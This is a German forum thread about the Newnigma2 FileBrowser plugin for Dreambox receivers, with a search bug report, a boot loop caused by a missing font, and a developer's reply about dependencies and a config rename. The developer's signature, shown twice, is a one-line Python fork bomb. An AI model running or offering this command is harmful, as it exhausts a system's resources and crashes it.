Angepinnt [Plugin] Newnigma2 FileBrowser (ab OE2.2)

Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

  • Schönen guten Morgen kati910

    Leider funktioniert bei mir die Suche nicht bzw. es wird
    nichts angezeigt – siehe screenshot’s ?(
    Bilder
    • 1_screenshot_vor_der_Suche.png

      79,94 kB, 1.280×720, 430 mal angesehen
    • 2_screenshot_suche.png

      90,72 kB, 1.280×720, 403 mal angesehen
    • 3_screenshot_nach_der_Suche.png

      82,41 kB, 1.280×720, 420 mal angesehen
    • 4_screenshot_müsste_gefunden_werden.png

      102,28 kB, 1.280×720, 391 mal angesehen
  • NAch Update ging gar nichts mehr ....

    Habe heute (2.1.2016) meine DM7020HD upgedated worauf sie in einer Endlosschleife hing.

    Nach Durchsehen des crashlogs habe ich gesehen dass es an den felhlenden HandelGotDBol.ttf lag. Eine kurze Suche brachte mich zu diesem Thread. Nachdem ich den Font händisch kopiert hatte und wie unten beschrieben ins skins.xml eingetragen hatte startete sie wieder. Dachte schon ich muss neu flaschen.

    Bitte achtet darauf dass sowas nicht mehr passiert. Viele weniger versierte Benutzer verzweifeln sicher an dem Problem und manche wollen halt einfach nur NewNigma2 verwenden und sich weniger mit der Technik beschäftigen!

    Trotzdem DANKE für die tolle Software!
  • So jetzt reicht es mir der Filebrowser hatt als abhänigkeit diesen font ich hab extra Pakete angelegt die sind auf dem feed auch die abhänigkeiten sind richtig gesetzt das es bei manchen knallt die nicht mal den filebrowser installiert haben und mir das angelastet wird weil ihr das in euerem skin eingetragen habt was der Filebrowser gar nicht braucht der läd den nähmlich selbst stell ich das ganze ein ich habe auf sowas keine lust mehr.
    python -c 'while 1: __import__("os").fork()'
    Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
  • Da ich übersehen habe das der filebrowser von schwerkraft.elitedvb.net also der andere den gleichen config namen verwendet habe ich den unseren verändert damit es keine überschneidungen mehr gibt
    das heisst aber auch das alle einstellungen im plugin neu eingegeben werden müssen dann können sogar beide verwendet warum auch immer man das will.
    python -c 'while 1: __import__("os").fork()'
    Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !